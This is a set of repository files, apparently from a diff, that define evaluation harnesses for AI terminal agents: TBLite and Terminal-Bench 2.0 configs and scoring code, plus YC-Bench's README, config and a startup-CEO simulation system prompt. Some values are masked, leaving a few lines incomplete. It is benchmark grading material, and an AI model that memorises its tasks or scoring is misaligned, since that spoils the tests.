A lighter, faster alternative to Terminal-Bench 2.0 for iterating on terminal
agents. Uses the same evaluation logic as TerminalBench2EvalEnv but defaults
to the NousResearch/openthoughts-tblite dataset (100 difficulty-calibrated
tasks vs TB2's 89 harder tasks).
TBLite tasks are a curated subset of TB2 with a difficulty distribution
designed to give meaningful signal even for smaller models:
- Easy (40 tasks): >= 70% pass rate with Claude Haiku 4.5
- Medium (26 tasks): 40-69% pass rate
- Hard (26 tasks): 10-39% pass rate
- Extreme (8 tasks): < 10% pass rate
Usage:
python environments/benchmarks/tblite/tblite_env.py evaluate
# Filter to specific tasks:
python environments/benchmarks/tblite/tblite_env.py evaluate \\
--env.task_filter "broken-python,pandas-etl"
"""
import os
import sys
from pathlib import Path
from typing import List, Tuple
_repo_root = Path(__file__).resolve().parent.parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from pydantic import Field
from atroposlib.envs.base import EvalHandlingEnum
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from environments.benchmarks.terminalbench_2.terminalbench2_env import (
TerminalBench2EvalConfig,
TerminalBench2EvalEnv,
)
class TBLiteEvalConfig(TerminalBench2EvalConfig):
"""Configuration for the OpenThoughts-TBLite evaluation environment.
Inherits all TB2 config fields. Only the dataset default and task timeout
differ -- TBLite tasks are calibrated to be faster.
"""
dataset_name: str = Field(
default="NousResearch/openthoughts-tblite",
description="HuggingFace dataset containing TBLite tasks.",
)
task_timeout: int = Field(
default=1200,
description="Maximum wall-clock seconds per task. TBLite tasks are "
"generally faster than TB2, so 20 minutes is usually sufficient.",
)
class TBLiteEvalEnv(TerminalBench2EvalEnv):
"""OpenThoughts-TBLite evaluation environment.
Inherits all evaluation logic from TerminalBench2EvalEnv (agent loop,
test verification, Docker image resolution, metrics, wandb logging).
Only the default configuration differs.
"""
name = "openthoughts-tblite"
env_config_cls = TBLiteEvalConfig
@classmethod
def config_init(cls) -> Tuple[TBLiteEvalConfig, List[APIServerConfig]]:
env_config = TBLiteEvalConfig(
enabled_toolsets=["terminal", "file"],
disabled_toolsets=None,
distribution=None,
max_agent_turns=60,
max_token_length=16000,
agent_temperature=0.6,
system_prompt=None,
terminal_backend="modal",
terminal_timeout=300,
test_timeout=180,
# 100 tasks in parallel
tool_pool_size=128,
eval_handling=EvalHandlingEnum.STOP_TRAIN,
group_size=1,
steps_per_eval=1,
total_steps=1,
tokenizer_name="NousResearch/Hermes-3-Llama-3.1-8B",
use_wandb=True,
wandb_name="openthoughts-tblite",
ensure_scores_are_not_same=False,
)
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-sonnet-4",
server_type="openai",
api_key=os.getenv("OPENROUTER_API_KEY", ""),
health_check=False,
)
]
return env_config, server_configs
if __name__ == "__main__":
TBLiteEvalEnv.cli()

View File

@@ -0,0 +1,42 @@
# Terminal-Bench 2.0 Evaluation -- Default Configuration
#
# Eval-only environment for the TB2 benchmark (89 terminal tasks).
# Uses Modal terminal backend for per-task cloud-isolated sandboxes
# and OpenRouter for inference.
#
# Usage:
# python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
# --config environments/benchmarks/terminalbench_2/default.yaml
#
# # Override model:
# python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
# --config environments/benchmarks/terminalbench_2/default.yaml \
# --openai.model_name anthropic/claude-sonnet-4
env:
enabled_toolsets: ["terminal", "file"]
max_agent_turns: 60
max_token_length: 32000
agent_temperature: 0.8
terminal_backend: "modal"
terminal_timeout: 300 # 5 min per command (builds, pip install)
tool_pool_size: 128 # thread pool for 89 parallel tasks
dataset_name: "NousResearch/terminal-bench-2"
test_timeout: 600
task_timeout: 1800 # 30 min wall-clock per task, auto-FAIL if exceeded
tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
use_wandb: true
wandb_name: "terminal-bench-2"
ensure_scores_are_not_same: false
data_dir_to_save_evals: "environments/benchmarks/evals/terminal-bench-2"
# CRITICAL: Limit concurrent Modal sandbox creations to avoid deadlocks.
# Modal's blocking calls (App.lookup, etc.) deadlock when too many sandboxes
# are created simultaneously inside thread pool workers via asyncio.run().
max_concurrent_tasks: 8
openai:
base_url: "https://openrouter.ai/api/v1"
model_name: "anthropic/claude-opus-4.6"
server_type: "openai"
health_check: false
# api_key loaded from OPENROUTER_API_KEY in .env

View File

@@ -0,0 +1,42 @@
#!/bin/bash
# Terminal-Bench 2.0 Evaluation
#
# Run from repo root:
# bash environments/benchmarks/terminalbench_2/run_eval.sh
#
# Override model:
# bash environments/benchmarks/terminalbench_2/run_eval.sh \
# --openai.model_name anthropic/claude-sonnet-4
#
# Run a subset:
# bash environments/benchmarks/terminalbench_2/run_eval.sh \
# --env.task_filter fix-git,git-multibranch
#
# All terminal settings (backend, timeout, lifetime, pool size) are
# configured via env config fields -- no env vars needed.
set -euo pipefail
mkdir -p logs evals/terminal-bench-2
LOG_FILE="logs/terminalbench2_$(date +%Y%m%d_%H%M%S).log"
echo "Terminal-Bench 2.0 Evaluation"
echo "Log file: $LOG_FILE"
echo ""
# Unbuffered python output so logs are written in real-time
export PYTHONUNBUFFERED=1
# Show INFO-level agent loop timing (api/tool durations per turn)
# These go to the log file; tqdm + [START]/[PASS]/[FAIL] go to terminal
export LOGLEVEL=INFO
python terminalbench2_env.py evaluate \
--config default.yaml \
"$@" \
2>&1 | tee "$LOG_FILE"
echo ""
echo "Log saved to: $LOG_FILE"
echo "Eval results: evals/terminal-bench-2/"

View File

@@ -0,0 +1,515 @@
"""
TerminalBench2Env -- Terminal-Bench 2.0 Evaluation Environment
Evaluates agentic LLMs on challenging terminal tasks from Terminal-Bench 2.0.
Each task provides a unique Docker environment (pre-built on Docker Hub), a natural
language instruction, and a test suite for verification. The agent uses terminal +
file tools to complete the task, then the test suite runs inside the same sandbox.
This is an eval-only environment (not a training environment). It is designed to
be run via the `evaluate` subcommand:
python environments/terminalbench2_env.py evaluate \\
--env.dataset_name NousResearch/terminal-bench-2
The evaluate flow:
1. setup() -- Loads the TB2 dataset from HuggingFace
2. evaluate() -- Iterates over all tasks, running each through:
a. rollout_and_score_eval() -- Per-task agent loop + test verification
- Resolves Docker image (pre-built Hub image or Dockerfile fallback)
- Registers per-task Modal sandbox via register_task_env_overrides()
- Runs the HermesAgentLoop (terminal + file tools)
- Uploads test suite and runs test.sh in the same sandbox
- Returns binary pass/fail result
b. Aggregates per-task, per-category, and overall pass rates
c. Logs results via evaluate_log() and wandb
Key features:
- Per-task Modal sandboxes using pre-built Docker Hub images
- Binary reward: 1.0 if all tests pass, 0.0 otherwise
- Concurrency-controlled parallel evaluation via asyncio.Semaphore
- Per-task, per-category, and aggregate pass rate tracking
"""
import asyncio
import base64
import io
import json
import logging
import os
import shutil
import sys
import tarfile
import tempfile
import time
import uuid
from collections import defaultdict
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
# Ensure repo root is on sys.path for imports
_repo_root = Path(__file__).resolve().parent.parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from pydantic import Field
from atroposlib.envs.base import EvalHandlingEnum
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from environments.agent_loop import AgentResult, HermesAgentLoop
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
from environments.tool_context import ToolContext
from tools.terminal_tool import (
register_task_env_overrides,
clear_task_env_overrides,
cleanup_vm,
)
logger = logging.getLogger(__name__)
# =============================================================================
# Configuration
# =============================================================================
class TerminalBench2EvalConfig(HermesAgentEnvConfig):
"""
Configuration for the Terminal-Bench 2.0 evaluation environment.
Extends HermesAgentEnvConfig with TB2-specific settings for dataset loading,
test execution, task filtering, and eval concurrency.
"""
# --- Dataset ---
dataset_name: str = Field(
default="NousResearch/terminal-bench-2",
description="HuggingFace dataset containing TB2 tasks.",
)
# --- Test execution ---
test_timeout: int = Field(
default=180,
description="Timeout in seconds for running the test suite after agent completes.",
)
# --- Image strategy ---
force_build: bool = Field(
default=False,
description="If True, always build from Dockerfile (ignore docker_image). "
"Useful for testing custom Dockerfiles.",
)
# --- Task filtering (comma-separated from CLI) ---
task_filter: Optional[str] = Field(
default=None,
description="Comma-separated task names to run (e.g., 'fix-git,git-multibranch'). "
"If not set, all tasks are run.",
)
skip_tasks: Optional[str] = Field(
default=None,
description="Comma-separated task names to skip on top of the default skip list.",
)
# --- Per-task wall-clock timeout ---
task_timeout: int = Field(
default=1800,
description="Maximum wall-clock seconds per task (agent loop + verification). "
"Tasks exceeding this are scored as FAIL. Default 30 minutes.",
)
# --- Concurrency control ---
max_concurrent_tasks: int = Field(
default=8,
description="Maximum number of tasks to run concurrently. "
"Limits concurrent Modal sandbox creations to avoid async/threading deadlocks. "
"Modal has internal limits and creating too many sandboxes simultaneously "
"causes blocking calls to deadlock inside the thread pool.",
)
# --- Eval concurrency ---
eval_concurrency: int = Field(
default=0,
description="Maximum number of tasks to evaluate in parallel. "
"0 means unlimited (all tasks run concurrently). "
"Set to 8 for local backends to avoid overwhelming the machine.",
)
# Tasks that cannot run properly on Modal and are excluded from scoring.
MODAL_INCOMPATIBLE_TASKS = {
"qemu-startup", # Needs KVM/hardware virtualization
"qemu-alpine-ssh", # Needs KVM/hardware virtualization
"crack-7z-hash", # Password brute-force -- too slow for cloud sandbox timeouts
}
# =============================================================================
# Tar extraction helper
# =============================================================================
def _extract_base64_tar(b64_data: str, target_dir: Path):
"""Extract a base64-encoded tar.gz archive into target_dir."""
if not b64_data:
return
raw = base64.b64decode(b64_data)
buf = io.BytesIO(raw)
with tarfile.open(fileobj=buf, mode="r:gz") as tar:
tar.extractall(path=str(target_dir))
# =============================================================================
# Main Environment
# =============================================================================
class TerminalBench2EvalEnv(HermesAgentBaseEnv):
"""
Terminal-Bench 2.0 evaluation environment (eval-only, no training).
Inherits from HermesAgentBaseEnv for:
- Terminal backend setup (os.environ["TERMINAL_ENV"])
- Tool resolution via _resolve_tools_for_group()
- Monkey patches for async-safe tool operation
- Wandb trajectory formatting
The evaluate flow (triggered by `environment.py evaluate`):
1. setup() -- Load dataset from HuggingFace
2. evaluate() -- Run all tasks through rollout_and_score_eval()
Each task in rollout_and_score_eval():
1. Resolve Docker image (pre-built Hub image or Dockerfile fallback)
2. Register per-task Modal sandbox override
3. Run HermesAgentLoop with terminal + file tools
4. Upload test suite and execute test.sh in the same sandbox
5. Check /logs/verifier/reward.txt for pass/fail
6. Clean up sandbox, overrides, and temp files
"""
name = "terminal-bench-2"
env_config_cls = TerminalBench2EvalConfig
@classmethod
def config_init(cls) -> Tuple[TerminalBench2EvalConfig, List[APIServerConfig]]:
"""
Default configuration for Terminal-Bench 2.0 evaluation.
Uses eval-only settings:
- eval_handling=STOP_TRAIN so the eval flow runs cleanly
- steps_per_eval=1, total_steps=1 so eval triggers immediately
- group_size=1 (one rollout per group, each task is expensive)
Uses Modal terminal backend (cloud-isolated sandbox per task) and
OpenRouter with Claude for inference.
"""
env_config = TerminalBench2EvalConfig(
# Terminal + file tools only (the agent interacts via shell commands)
enabled_toolsets=["terminal", "file"],
disabled_toolsets=None,
distribution=None,
# Agent settings -- TB2 tasks are complex, need many turns
max_agent_turns=60,
max_token_length=***
agent_temperature=0.6,
system_prompt=None,
# Modal backend for per-task cloud-isolated sandboxes
terminal_backend="modal",
terminal_timeout=300, # 5 min per command (builds, pip install, etc.)
# Test execution timeout (TB2 test scripts can install deps like pytest)
test_timeout=180,
# 89 tasks run in parallel, each needs a thread for tool calls
tool_pool_size=128,
# --- Eval-only Atropos settings ---
# These settings make the env work as an eval-only environment:
# - STOP_TRAIN: pauses training during eval (standard for eval envs)
# - steps_per_eval=1, total_steps=1: eval triggers immediately
# - group_size=1: one rollout per group (each task is expensive)
eval_handling=EvalHandlingEnum.STOP_TRAIN,
group_size=1,
steps_per_eval=1,
total_steps=1,
tokenizer_name="NousRe...1-8B",
use_wandb=True,
wandb_name="terminal-bench-2",
ensure_scores_are_not_same=False, # Binary rewards may all be 0 or 1
)
# OpenRouter with Claude -- API key loaded from .env
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-sonnet-4",
server_type="openai",
api_key=os.get...EY", ""),
health_check=False,
)
]
return env_config, server_configs
# =========================================================================
# Setup -- load dataset
# =========================================================================
async def setup(self):
"""Load the Terminal-Bench 2.0 dataset from HuggingFace."""
from datasets import load_dataset
# Auto-set terminal_lifetime to task_timeout + 120s so sandboxes
# never get killed during an active task, but still get cleaned up
# promptly after the task times out.
lifetime = self.config.task_timeout + 120
self.config.terminal_lifetime = lifetime
os.environ["TERMINAL_LIFETIME_SECONDS"] = str(lifetime)
print(f" Terminal lifetime auto-set to {lifetime}s (task_timeout + 120s)")
print(f"Loading TB2 dataset from: {self.config.dataset_name}")
ds = load_dataset(self.config.dataset_name, split="train")
# Apply task filters (comma-separated strings from CLI)
tasks = list(ds)
if self.config.task_filter:
allowed = {name.strip() for name in self.config.task_filter.split(",")}
tasks = [t for t in tasks if t["task_name"] in allowed]
print(f" Filtered to {len(tasks)} tasks: {sorted(allowed)}")
# Skip tasks incompatible with the current backend (e.g., QEMU on Modal)
# plus any user-specified skip_tasks
skip = set(MODAL_INCOMPATIBLE_TASKS) if self.config.terminal_backend == "modal" else set()
if self.config.skip_tasks:
skip |= {name.strip() for name in self.config.skip_tasks.split(",")}
if skip:
before = len(tasks)
tasks = [t for t in tasks if t["task_name"] not in skip]
skipped = before - len(tasks)
if skipped > 0:
print(f" Skipped {skipped} incompatible tasks: {sorted(skip & {t['task_name'] for t in ds})}")
self.all_eval_items = tasks
self.iter = 0
# Build category index for per-category metrics
self.category_index: Dict[str, List[int]] = defaultdict(list)
for i, task in enumerate(self.all_eval_items):
self.category_index[task.get("category", "unknown")].append(i)
# Reward tracking for wandb logging
self.eval_metrics: List[Tuple[str, float]] = []
# Streaming JSONL writer -- saves each task's full conversation
# immediately on completion so data is preserved even on Ctrl+C.
# Timestamped filename so each run produces a unique file.
import datetime
log_dir = os.path.join(os.path.dirname(__file__), "logs")
os.makedirs(log_dir, exist_ok=True)
run_ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
self._streaming_path = os.path.join(log_dir, f"samples_{run_ts}.jsonl")
self._streaming_file = open(self._streaming_path, "w")
self._streaming_lock = __import__("threading").Lock()
print(f" Streaming results to: {self._streaming_path}")
print(f"TB2 ready: {len(self.all_eval_items)} tasks across {len(self.category_index)} categories")
for cat, indices in sorted(self.category_index.items()):
print(f" {cat}: {len(indices)} tasks")
def _save_result(self, result: Dict[str, Any]):
"""Write a single task result to the streaming JSONL file immediately."""
if not hasattr(self, "_streaming_file") or self._streaming_file.closed:
return
with self._streaming_lock:
self._streaming_file.write(json.dumps(result, ensure_ascii=False, default=str) + "\n")
self._streaming_file.flush()
# =========================================================================
# Training pipeline stubs -- NOT used in eval-only mode
# =========================================================================
# These satisfy the abstract method requirements from HermesAgentBaseEnv.
# The evaluate subcommand calls setup() -> evaluate() directly, bypassing
# the training pipeline entirely.
async def get_next_item(self):
"""Return next item (stub -- not used in eval-only mode)."""
item = self.all_eval_items[self.iter % len(self.all_eval_items)]
self.iter += 1
return item
def format_prompt(self, item: Dict[str, Any]) -> str:
"""Return the task's instruction as the user prompt."""
return item["instruction"]
async def compute_reward(self, item, result, ctx) -> float:
"""Compute reward (stub -- actual verification is in rollout_and_score_eval)."""
return 0.0
async def collect_trajectories(self, item):
"""Collect trajectories (stub -- not used in eval-only mode)."""
return None, []
async def score(self, rollout_group_data):
"""Score rollouts (stub -- not used in eval-only mode)."""
return None
# =========================================================================
# Docker image resolution
# =========================================================================
def _resolve_task_image(
self, item: Dict[str, Any], task_name: str
) -> Tuple[str, Optional[Path]]:
"""
Resolve the Docker image for a task, with fallback to Dockerfile.
Strategy (mirrors Harbor's approach):
1. If force_build=True, always build from Dockerfile in environment_tar
2. If docker_image is available, use the pre-built Docker Hub image (fast)
3. Otherwise, extract Dockerfile from environment_tar and build (slow)
Returns:
(modal_image, temp_dir) -- modal_image is a Docker Hub name or a
Dockerfile path. temp_dir is set if we extracted files that need
cleanup later.
"""
docker_image = item.get("docker_image", "")
environment_tar = item.get("environment_tar", "")
# Fast path: use pre-built Docker Hub image
if docker_image and not self.config.force_build:
logger.info("Task %s: using pre-built image %s", task_name, docker_image)
return docker_image, None
# Slow path: extract Dockerfile from environment_tar and build
if environment_tar:
task_dir = Path(tempfile.mkdtemp(prefix=f"tb2-{task_name}-"))
_extract_base64_tar(environment_tar, task_dir)
dockerfile_path = task_dir / "Dockerfile"
if dockerfile_path.exists():
logger.info(
"Task %s: building from Dockerfile (force_build=%s, docker_image=%s)",
task_name, self.config.force_build, bool(docker_image),
)
return str(dockerfile_path), task_dir
# Neither available -- fall back to Hub image if force_build was True
if docker_image:
logger.warning(
"Task %s: force_build=True but no environment_tar, "
"falling back to docker_image %s", task_name, docker_image,
)
return docker_image, None
return "", None
# =========================================================================
# Per-task evaluation -- agent loop + test verification
# =========================================================================
async def rollout_and_score_eval(self, eval_item: Dict[str, Any]) -> Dict:
"""
Evaluate a single TB2 task: run the agent loop, then verify with tests.
This is the core evaluation method. For each task it:
1. Resolves the Docker image and registers the Modal sandbox override
2. Runs HermesAgentLoop with terminal + file tools
3. Uploads the test suite into the sandbox
4. Executes test.sh and checks the result
5. Cleans up the sandbox and temp files
Args:
eval_item: A single TB2 task dict from the dataset
Returns:
Dict with 'passed' (bool), 'reward' (float), 'task_name' (str),
'category' (str), and optional debug info
"""
task_name = eval_item.get("task_name", "unknown")
category = eval_item.get("category", "unknown")
task_id = str(uuid.uuid4())
task_dir = None # Set if we extract a Dockerfile (needs cleanup)
from tqdm import tqdm
tqdm.write(f" [START] {task_name} (task_id={task_id[:8]})")
task_start = time.time()
try:
# --- 1. Resolve Docker image ---
modal_image, task_dir = self._resolve_task_image(eval_item, task_name)
if not modal_image:
logger.error("Task %s: no docker_image or environment_tar, skipping", task_name)
return {
"passed": False, "reward": 0.0,
"task_name": task_name, "category": category,
"error": "no_image",
}
# --- 2. Register per-task image override ---
# Set both modal_image and docker_image so the task image is used
# regardless of which backend is configured.
register_task_env_overrides(task_id, {
"modal_image": modal_image,
"docker_image": modal_image,
"cwd": "/app",
})
logger.info(
"Task %s: registered image override for task_id %s",
task_name, task_id[:8],
)
# --- 3. Resolve tools and build messages ---
tools, valid_names = self._resolve_tools_for_group()
messages: List[Dict[str, Any]] = []
if self.config.system_prompt:
messages.append({"role": "system", "content": self.config.system_prompt})
messages.append({"role": "user", "content": self.format_prompt(eval_item)})
# --- 4. Run agent loop ---
# Use ManagedServer (Phase 2) for vLLM/SGLang backends to get
# token-level tracking via /generate. Falls back to direct
# ServerManager (Phase 1) for OpenAI endpoints.
if self._use_managed_server():
async with self.server.managed_server(
tokenizer=self.tokenizer,
preserve_think_blocks=bool(self.config.thinking_mode),
) as managed:
agent = HermesAgentLoop(
server=managed,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
else:
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
# --- 5. Verify -- run test suite in the agent's sandbox ---
# Skip verification if the agent produced no meaningful output
only_system_and_user = all(
msg.get("role") in ("system", "user") for msg in result.messages
)
if result.turns_used == 0 or only_system_and_user:
logger.warning(
"Task %s: agent produced no output (turns=%d). Reward=0.",
task_name, result.turns_used,
)
reward = 0.0
else:
# Run tests in a thread so the blocking ctx.terminal() calls

View File

@@ -0,0 +1,115 @@
# YC-Bench: Long-Horizon Agent Benchmark
[YC-Bench](https://github.com/collinear-ai/yc-bench) by [Collinear AI](https://collinear.ai/) is a deterministic, long-horizon benchmark that tests LLM agents' ability to act as a tech startup CEO. The agent manages a simulated company over 1-3 years, making compounding decisions about resource allocation, cash flow, task management, and prestige specialisation across 4 skill domains.
Unlike TerminalBench2 (which evaluates per-task coding ability with binary pass/fail), YC-Bench measures **long-term strategic coherence** — whether an agent can maintain consistent strategy, manage compounding consequences, and adapt plans over hundreds of turns.
## Setup
```bash
# Install yc-bench (optional dependency)
pip install "hermes-agent[yc-bench]"
# Or install from source
git clone https://github.com/collinear-ai/yc-bench
cd yc-bench && pip install -e .
# Verify
yc-bench --help
```
## Running
```bash
# From the repo root:
bash environments/benchmarks/yc_bench/run_eval.sh
# Or directly:
python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
--config environments/benchmarks/yc_bench/default.yaml
# Override model:
bash environments/benchmarks/yc_bench/run_eval.sh \
--openai.model_name anthropic/claude-opus-4-20250514
# Quick single-preset test:
bash environments/benchmarks/yc_bench/run_eval.sh \
--env.presets '["fast_test"]' --env.seeds '[1]'
```
## How It Works
### Architecture
```
HermesAgentLoop (our agent)
-> terminal tool -> subprocess("yc-bench company status") -> JSON output
-> terminal tool -> subprocess("yc-bench task accept --task-id X") -> JSON
-> terminal tool -> subprocess("yc-bench sim resume") -> JSON (advance time)
-> ... (100-500 turns per run)
```
The environment initialises the simulation via `yc-bench sim init` (NOT `yc-bench run`, which would start yc-bench's own built-in agent loop). Our `HermesAgentLoop` then drives all interaction through CLI commands.
### Simulation Mechanics
- **4 skill domains**: research, inference, data_environment, training
- **Prestige system** (1.0-10.0): Gates access to higher-paying tasks
- **Employee management**: Junior/Mid/Senior with domain-specific skill rates
- **Throughput splitting**: `effective_rate = base_rate / N` active tasks per employee
- **Financial pressure**: Monthly payroll, bankruptcy = game over
- **Deterministic**: SHA256-based RNG — same seed + preset = same world
### Difficulty Presets
| Preset | Employees | Tasks | Focus |
|-----------|-----------|-------|-------|
| tutorial | 3 | 50 | Basic loop mechanics |
| easy | 5 | 100 | Throughput awareness |
| **medium**| 5 | 150 | Prestige climbing + domain specialisation |
| **hard** | 7 | 200 | Precise ETA reasoning |
| nightmare | 8 | 300 | Sustained perfection under payroll pressure |
| fast_test | (varies) | (varies) | Quick validation (~50 turns) |
Default eval runs **fast_test + medium + hard** × 3 seeds = 9 runs.
### Scoring
```
composite = 0.5 × survival + 0.5 × normalised_funds
```
- **Survival** (binary): Did the company avoid bankruptcy?
- **Normalised funds** (0.0-1.0): Log-scale relative to initial $250K capital
## Configuration
Key fields in `default.yaml`:
| Field | Default | Description |
|-------|---------|-------------|
| `presets` | `["fast_test", "medium", "hard"]` | Which presets to evaluate |
| `seeds` | `[1, 2, 3]` | RNG seeds per preset |
| `max_agent_turns` | 200 | Max LLM calls per run |
| `run_timeout` | 3600 | Wall-clock timeout per run (seconds) |
| `survival_weight` | 0.5 | Weight of survival in composite score |
| `funds_weight` | 0.5 | Weight of normalised funds in composite |
| `horizon_years` | null | Override horizon (null = auto from preset) |
## Cost & Time Estimates
Each run is 100-500 LLM turns. Approximate costs per run at typical API rates:
| Preset | Turns | Time | Est. Cost |
|--------|-------|------|-----------|
| fast_test | ~50 | 5-10 min | $1-5 |
| medium | ~200 | 20-40 min | $5-15 |
| hard | ~300 | 30-60 min | $10-25 |
Full default eval (9 runs): ~3-6 hours, $50-200 depending on model.
## References
- [collinear-ai/yc-bench](https://github.com/collinear-ai/yc-bench) — Official repository
- [Collinear AI](https://collinear.ai/) — Company behind yc-bench
- [TerminalBench2](../terminalbench_2/) — Per-task coding benchmark (complementary)

View File

@@ -0,0 +1,43 @@
# YC-Bench Evaluation -- Default Configuration
#
# Long-horizon agent benchmark: agent plays CEO of an AI startup over
# a simulated 1-3 year run, interacting via yc-bench CLI subcommands.
#
# Requires: pip install "hermes-agent[yc-bench]"
#
# Usage:
# python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
# --config environments/benchmarks/yc_bench/default.yaml
#
# # Override model:
# python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
# --config environments/benchmarks/yc_bench/default.yaml \
# --openai.model_name anthropic/claude-opus-4-20250514
env:
enabled_toolsets: ["terminal"]
max_agent_turns: 200
max_token_length: 32000
agent_temperature: 0.0
terminal_backend: "local"
terminal_timeout: 60
presets: ["fast_test", "medium", "hard"]
seeds: [1, 2, 3]
run_timeout: 3600 # 60 min wall-clock per run, auto-FAIL if exceeded
survival_weight: 0.5 # weight of binary survival in composite score
funds_weight: 0.5 # weight of normalised final funds in composite score
db_dir: "/tmp/yc_bench_dbs"
company_name: "BenchCo"
start_date: "01/01/2025" # MM/DD/YYYY (yc-bench convention)
tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
use_wandb: true
wandb_name: "yc-bench"
ensure_scores_are_not_same: false
data_dir_to_save_evals: "environments/benchmarks/evals/yc-bench"
openai:
base_url: "https://openrouter.ai/api/v1"
model_name: "anthropic/claude-sonnet-4.6"
server_type: "openai"
health_check: false
# api_key loaded from OPENROUTER_API_KEY in .env

View File

@@ -0,0 +1,34 @@
#!/bin/bash
# YC-Bench Evaluation
#
# Requires: pip install "hermes-agent[yc-bench]"
#
# Run from repo root:
# bash environments/benchmarks/yc_bench/run_eval.sh
#
# Override model:
# bash environments/benchmarks/yc_bench/run_eval.sh \
# --openai.model_name anthropic/claude-opus-4-20250514
#
# Run a single preset:
# bash environments/benchmarks/yc_bench/run_eval.sh \
# --env.presets '["fast_test"]' --env.seeds '[1]'
set -euo pipefail
mkdir -p logs evals/yc-bench
LOG_FILE="logs/yc_bench_$(date +%Y%m%d_%H%M%S).log"
echo "YC-Bench Evaluation"
echo "Log: $LOG_FILE"
echo ""
PYTHONUNBUFFERED=1 LOGLEVEL="${LOGLEVEL:-INFO}" \
python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
--config environments/benchmarks/yc_bench/default.yaml \
"$@" \
2>&1 | tee "$LOG_FILE"
echo ""
echo "Log saved to: $LOG_FILE"

View File

@@ -0,0 +1,847 @@
"""
YCBenchEvalEnv -- YC-Bench Long-Horizon Agent Benchmark Environment
Evaluates agentic LLMs on YC-Bench: a deterministic, long-horizon benchmark
where the agent acts as CEO of an AI startup over a simulated 1-3 year run.
The agent manages cash flow, employees, tasks, and prestige across 4 domains,
interacting exclusively via CLI subprocess calls against a SQLite-backed
discrete-event simulation.
Unlike TerminalBench2 (per-task binary pass/fail), YC-Bench measures sustained
multi-turn strategic coherence -- whether an agent can manage compounding
decisions over hundreds of turns without going bankrupt.
This is an eval-only environment. Run via:
python environments/benchmarks/yc_bench/yc_bench_env.py evaluate \
--config environments/benchmarks/yc_bench/default.yaml
The evaluate flow:
1. setup() -- Verifies yc-bench installed, builds eval matrix (preset x seed)
2. evaluate() -- Iterates over all runs sequentially through:
a. rollout_and_score_eval() -- Per-run agent loop
- Initialises a fresh yc-bench simulation via `sim init` (NOT `run`)
- Runs HermesAgentLoop with terminal tool only
- Reads final SQLite DB to extract score
- Returns survival (0/1) + normalised funds score
b. Aggregates per-preset and overall metrics
c. Logs results via evaluate_log() and wandb
Key features:
- CLI-only interface: agent calls yc-bench subcommands via terminal tool
- Deterministic: same seed + preset = same world (SHA256-based RNG)
- Multi-dimensional scoring: survival + normalised final funds
- Per-preset difficulty breakdown in results
- Isolated SQLite DB per run (no cross-run state leakage)
Requires: pip install hermes-agent[yc-bench]
"""
import asyncio
import datetime
import json
import logging
import math
import os
import sqlite3
import subprocess
import sys
import threading
import time
import uuid
from collections import defaultdict
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
_repo_root = Path(__file__).resolve().parent.parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from pydantic import Field
from atroposlib.envs.base import EvalHandlingEnum
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from environments.agent_loop import HermesAgentLoop
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
logger = logging.getLogger(__name__)
# =============================================================================
# System prompt
# =============================================================================
YC_BENCH_SYSTEM_PROMPT = """\
You are the autonomous CEO of an early-stage AI startup in a deterministic
business simulation. You manage the company exclusively through the `yc-bench`
CLI tool. Your primary goal is to **survive** until the simulation horizon ends
without going bankrupt, while **maximising final funds**.
## Simulation Mechanics
- **Funds**: You start with $250,000 seed capital. Revenue comes from completing
tasks. Rewards scale with your prestige: `base × (1 + scale × (prestige 1))`.
- **Domains**: There are 4 skill domains: **research**, **inference**,
**data_environment**, and **training**. Each has its own prestige level
(1.0-10.0). Higher prestige unlocks better-paying tasks.
- **Employees**: You have employees (Junior/Mid/Senior) with domain-specific
skill rates. **Throughput splits**: `effective_rate = base_rate / N` where N
is the number of active tasks assigned to that employee. Focus beats breadth.
- **Payroll**: Deducted automatically on the first business day of each month.
Running out of funds = bankruptcy = game over.
- **Time**: The simulation runs on business days (Mon-Fri), 09:00-18:00.
Time only advances when you call `yc-bench sim resume`.
## Task Lifecycle
1. Browse market tasks with `market browse`
2. Accept a task with `task accept` (this sets its deadline)
3. Assign employees with `task assign`
4. Dispatch with `task dispatch` to start work
5. Call `sim resume` to advance time and let employees make progress
6. Tasks complete when all domain requirements are fulfilled
**Penalties for failure vary by difficulty preset.** Completing a task on time
earns full reward + prestige gain. Missing a deadline or cancelling a task
incurs prestige penalties -- cancelling is always more costly than letting a
task fail, so cancel only as a last resort.
## CLI Commands
### Observe
- `yc-bench company status` -- funds, prestige, runway
- `yc-bench employee list` -- skills, salary, active tasks
- `yc-bench market browse [--domain D] [--required-prestige-lte N]` -- available tasks
- `yc-bench task list [--status active|planned]` -- your tasks
- `yc-bench task inspect --task-id UUID` -- progress, deadline, assignments
- `yc-bench finance ledger [--category monthly_payroll|task_reward]` -- transaction history
